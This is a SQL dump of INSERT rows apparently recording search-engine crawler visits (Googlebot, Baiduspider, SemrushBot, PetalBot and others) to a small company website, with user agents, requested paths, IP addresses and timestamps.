INSERT INTO `ey_weapp_spider_visit` VALUES ('95149', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.110', '1660644272', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95150', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/194.html', '185.191.171.24', '1660644570', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95151', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_39.html', '185.191.171.8', '1660644837', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95152', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/', '42.236.10.123', '1660645500', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95153', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/', '180.163.220.61', '1660645510', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95154', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '113.195.121.236', '1660645619', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95156', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/gongsijianjie', '116.179.32.196', '1660647175', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95216', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/283.html', '185.191.171.33', '1660677781', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95226', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660683745', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95227', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/449.html', '66.249.79.112', '1660683894', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95228', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_27/', '185.191.171.36', '1660686649', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95233', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/', '185.191.171.3', '1660692400', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95234', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.110', '1660692941', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95236', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/115.html', '116.179.32.94', '1660696502', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95238', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/102.html', '66.249.79.112', '1660697068', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95239', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/60_3.html', '185.191.171.5', '1660697777', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95241', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/248.html', '66.249.79.110', '1660699258', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96781', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/492.html', '162.55.86.60', '1661444654', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96782', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/493.html', '162.55.86.60', '1661444660', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96784', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/list_3_2/', '162.55.86.60', '1661444671', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96785', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/list_3_3/', '162.55.86.60', '1661444680', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96786', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/list_3_4/', '162.55.86.60', '1661444689', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96787', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/list_3_5/', '162.55.86.60', '1661444702', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96788', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/list_3_69/', '162.55.86.60', '1661444714', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96791', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/list_2_3/', '162.55.86.60', '1661444733', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96792', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/tbxw/list_91_2/', '162.55.86.60', '1661444744', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96793', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/yqal/list_21_2/', '162.55.86.60', '1661444751', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96794', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/yqal/list_21_3/', '162.55.86.60', '1661444758', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96795', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/117.html', '185.191.171.39', '1661445266', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96796', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/173.html', '185.191.171.16', '1661446212', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96797', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/182.html', '185.191.171.37', '1661446353', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96798', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/405.html', '17.121.114.43', '1661447597', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96799', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_41.html', '185.191.171.24', '1661447712', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96800', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/88.html', '185.191.171.2', '1661449061', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96801', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/products/321.html', '17.121.115.26', '1661449434', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96802', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/199.html', '185.191.171.16', '1661449759', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96803', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_24/', '216.244.66.194', '1661450757', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96804', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/492.html', '114.119.151.155', '1661451098', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96805', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_29.html', '116.179.32.200', '1661451318', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96806', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/483.html', '66.249.79.112', '1661452799', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96807', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/483.html', '66.249.79.108', '1661452965', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96808', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/311.html', '185.191.171.21', '1661453475', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96810', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/240.html', '185.191.171.19', '1661454385', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96811', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.110', '1661454464', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96813', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/message', '185.191.171.41', '1661454856', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96814', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/220.html', '114.119.151.153', '1661455866', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96815', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1661456130', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96816', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/317.html', '66.249.79.110', '1661456463', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96818', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/lpss.html', '114.119.151.153', '1661457918', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96819', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_58/', '185.191.171.2', '1661459182', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96821', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/products/361.html', '17.121.115.1', '1661459321', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96823', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/73_5.html', '185.191.171.26', '1661459385', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96824', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/139.html', '185.191.171.6', '1661459470', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96825', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_17/', '114.119.151.155', '1661461199', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96826', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/82.html', '66.249.79.110', '1661461318', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96827', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/32.html', '116.179.32.238', '1661461919', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96828', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/products/328.html', '17.121.112.96', '1661462308', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96829', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1661462465', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96830', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1661463113', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96831', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/hld.html', '114.119.151.155', '1661463418', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96832', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/469.html', '17.121.112.22', '1661463583', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96833', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '175.182.182.132', '1661463695', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96834', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/about/', '66.249.79.110', '1661463824', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96835', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/ays.html', '114.119.151.155', '1661464006', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96836', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/yqal/', '185.191.171.9', '1661464323', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96837', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/261.html', '17.121.114.141', '1661464724', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96839', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/356.html', '17.121.114.200', '1661466014', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96840', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/136.html', '66.249.79.110', '1661466104', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96841', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/238.html', '66.249.79.110', '1661466175', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96842', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.21.104', '1661466328', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96843', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/122.html', '66.249.79.108', '1661466847', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96844', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/86.html', '185.191.171.41', '1661467657', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96846', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/buliaoji', '216.244.66.194', '1661467971', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96849', '6', 'mozilla/5.0 applewebkit/537.36 (khtml, like gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) chrome/103.0.5060.134 safari/537.36', '/', '207.46.13.9', '1661469389', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96850', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/372.html', '66.249.79.108', '1661469392', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96851', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.152', '1661469494', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96852', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/486.html', '114.119.151.153', '1661470049', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96853', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/101.html', '66.249.79.110', '1661470185', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96855', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/75.html', '185.191.171.11', '1661470567', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96856', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1661470923', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96857', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.112', '1661470924', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96859', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/85_3.html', '185.191.171.21', '1661471440', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96860', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_2.html', '116.179.32.150', '1661471738', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96861', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/372.html', '157.55.39.117', '1661472201', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96862', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/8.html?tagid=8', '185.191.171.19', '1661472480', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96864', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/wlcb.html', '114.119.151.155', '1661474494', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96865', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_27/', '114.119.151.155', '1661474848', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96867', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/388.html', '114.119.151.153', '1661475247', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96868', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/hfs.html', '114.119.151.153', '1661475611', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96869', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_33.html', '116.179.32.75', '1661476647', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96870', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/2_3.html', '185.191.171.15', '1661477392', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96871', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/121.html', '66.249.79.108', '1661482066', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96873', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/31_3.html', '185.191.171.19', '1661483958', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96874', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/466.html', '66.249.79.110', '1661484766', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96875', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/zhaoyang.html', '114.119.151.155', '1661485242', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96876', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/gjxw', '116.179.32.139', '1661486463', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96877', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/460.html', '114.119.151.153', '1661487721', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96878', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/455.html', '216.244.66.194', '1661487776', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96881', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.110', '1661490570', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96882', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/472.html', '66.249.79.110', '1661491066', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96883', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1661491118', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96887', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/466.html', '66.249.79.112', '1661492266', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96888', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_6.html', '185.191.171.42', '1661493908', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96889', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/216.html', '185.191.171.11', '1661494113', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96914', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/145.html', '216.244.66.194', '1661504585', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96915', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/429.html', '116.179.32.195', '1661504869', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96918', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/472.html', '114.119.151.153', '1661505473', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96920', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/xinyi.html', '114.119.151.155', '1661505790', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96923', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/387.html', '114.119.151.155', '1661506294', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96924', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/146.html', '114.119.151.155', '1661506614', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96925', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/337.html', '114.119.151.155', '1661506876', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96926', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/497.html', '114.119.151.153', '1661507200', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96929', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/lianyungang.html', '114.119.151.155', '1661508305', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96930', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/488.html', '220.181.108.177', '1661508344', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96932', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/pzhs.html', '114.119.151.155', '1661508879', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96933', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/', '42.236.10.77', '1661508886', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96934', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/sts.html', '114.119.151.155', '1661509145', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96935', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.108', '1661509230', '0');
